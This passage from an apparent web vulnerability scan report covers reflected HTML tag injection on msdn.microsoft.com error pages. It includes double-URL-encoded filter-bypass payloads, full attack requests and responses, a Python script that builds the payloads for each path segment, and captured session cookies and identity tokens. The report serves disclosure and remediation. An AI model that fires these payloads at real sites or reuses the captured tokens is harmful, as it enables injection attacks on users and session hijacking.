msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87f9c"><a>4444cb60aed/library/ms123401" />
...[SNIP]...

2.106. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms123401.aspx

Issue detail

The value of REST URL parameter 2 (the second path segment, library) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload 48b6c%2522%253e%253ca%253ea82109ceb41 was submitted appended to REST URL parameter 2. This input was echoed as 48b6c"><a>a82109ceb41 in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library48b6c%2522%253e%253ca%253ea82109ceb41/ms123401.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library48b6c"><a>a82109ceb41/ms123401" />
...[SNIP]...
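Findings 2.105 through 2.113 all follow one pattern: a double-URL-encoded `"><a>` marker is appended to one path segment, IIS decodes the path once, the application decodes it again, and the result is written unencoded into the `value="..."` of the hidden `fromPage` input on the error page, so the `"` closes the attribute and `<a>` becomes a live tag. The Python below is an added example, not code from the CloudScan/Burp report and not Microsoft's code. `error_page()` is a hypothetical stand-in for the MSDN error handler (the real one also drops the `.aspx` extension, as the echoed `fromPage` values above show); everything else reproduces the report's own payload shape and the three request forms for REST URL parameters 1, 2 and 3.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# Scanner-style marker: "><a> wrapped in a constructed hex prefix/suffix so the
# reflection is unambiguous (mirrors the report's 48b6c...a82109ceb41 payload).
PREFIX, SUFFIX = "48b6c", "a82109ceb41"
BREAKOUT = '"><a>'


def double_encode(s: str) -> str:
    """URL-encode twice: " -> %22 -> %2522, < -> %3C -> %253C.
    quote() emits upper-case hex; the report shows lower-case, which any
    decoder treats identically."""
    return quote(quote(s, safe=""), safe="")


def scanner_payload() -> str:
    return PREFIX + double_encode(BREAKOUT) + SUFFIX


def inject_rest_param(path: str, n: int, payload: str) -> str:
    """Append payload to the n-th (1-based) path segment, as the report's
    requests do:
      n=1 -> /en-us<p>/library/ms123401.aspx
      n=2 -> /en-us/library<p>/ms123401.aspx
      n=3 -> /en-us/library/ms123401.aspx<p>
    """
    segments = path.lstrip("/").split("/")
    if not 1 <= n <= len(segments):
        raise ValueError(f"{path!r} has {len(segments)} segments; no parameter {n}")
    segments[n - 1] += payload
    return "/" + "/".join(segments)


def error_page(raw_path: str, *, app_decodes_again: bool, encode_output: bool) -> str:
    """Hypothetical stand-in for the error handler that reflects the failing
    path into <input name="fromPage">.  The web server has already
    URL-decoded the path once; the reported weakness is the application
    decoding it a second time and writing it into the attribute unencoded."""
    path = unquote(raw_path)                  # the server's single decode
    if app_decodes_again:
        path = unquote(path)                  # redundant: %2522 -> %22 -> "
    value = html.escape(path, quote=True) if encode_output else path
    return (
        '<input type="hidden" name="fromPage" '
        'value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm'
        f'?aspxerrorpath={value}" />'
    )


class _TagCollector(HTMLParser):
    """Records every start tag the browser's parser would create."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page: str):
    """Tags beyond the single <input>; non-empty means the quote closed the
    attribute and new markup was injected."""
    p = _TagCollector()
    p.feed(page)
    p.close()
    return [t for t in p.tags if t != "input"]


def check(path: str, n: int, **server_flags) -> bool:
    """One scanner-style probe: True if the decoded marker lands in the page
    as live markup (the condition behind the report's 'Firm' confidence)."""
    page = error_page(inject_rest_param(path, n, scanner_payload()), **server_flags)
    return (PREFIX + BREAKOUT + SUFFIX) in page and "a" in injected_tags(page)


if __name__ == "__main__":
    target = "/en-us/library/ms123401.aspx"
    for n in (1, 2, 3):
        vuln = check(target, n, app_decodes_again=True, encode_output=False)
        fixed = check(target, n, app_decodes_again=True, encode_output=True)
        print(f"REST URL parameter {n}: vulnerable={vuln} after_encoding={fixed}")
```

Two points the report's remediation text leaves implicit. Removing the second decode (`app_decodes_again=False`) closes this particular probe, but the durable fix is the `encode_output=True` path: HTML-attribute-encode `aspxerrorpath` at the point where it is written into `value="..."`, so that any `"` or `<` reaching the handler by whatever route is rendered as text. And the scanner only confirmed tag injection (`<a>`), not script execution; before accepting the High rating, reproduce the reflection in a browser and test whether the same filter that the double encoding bypassed also blocks the characters a script-bearing payload needs.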

2.107. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms123401.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3898%2522%253e%253ca%253e4b48fd0aba8 was submitted in the REST URL parameter 3. This input was echoed as c3898"><a>4b48fd0aba8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms123401.aspxc3898%2522%253e%253ca%253e4b48fd0aba8 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms123401.aspxc3898"><a>4b48fd0aba8" />
...[SNIP]...

2.108. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms376734.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d4f%2522%253e%253ca%253e3bf87eee46 was submitted in the REST URL parameter 1. This input was echoed as 16d4f"><a>3bf87eee46 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us16d4f%2522%253e%253ca%253e3bf87eee46/library/ms376734.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us16d4f"><a>3bf87eee46/library/ms376734" />
...[SNIP]...

2.109. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms376734.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1de4%2522%253e%253ca%253e15de1465623 was submitted in the REST URL parameter 2. This input was echoed as b1de4"><a>15de1465623 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryb1de4%2522%253e%253ca%253e15de1465623/ms376734.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryb1de4"><a>15de1465623/ms376734" />
...[SNIP]...

2.110. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms376734.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5baf%2522%253e%253ca%253ed814d454776 was submitted in the REST URL parameter 3. This input was echoed as f5baf"><a>d814d454776 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms376734.aspxf5baf%2522%253e%253ca%253ed814d454776 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
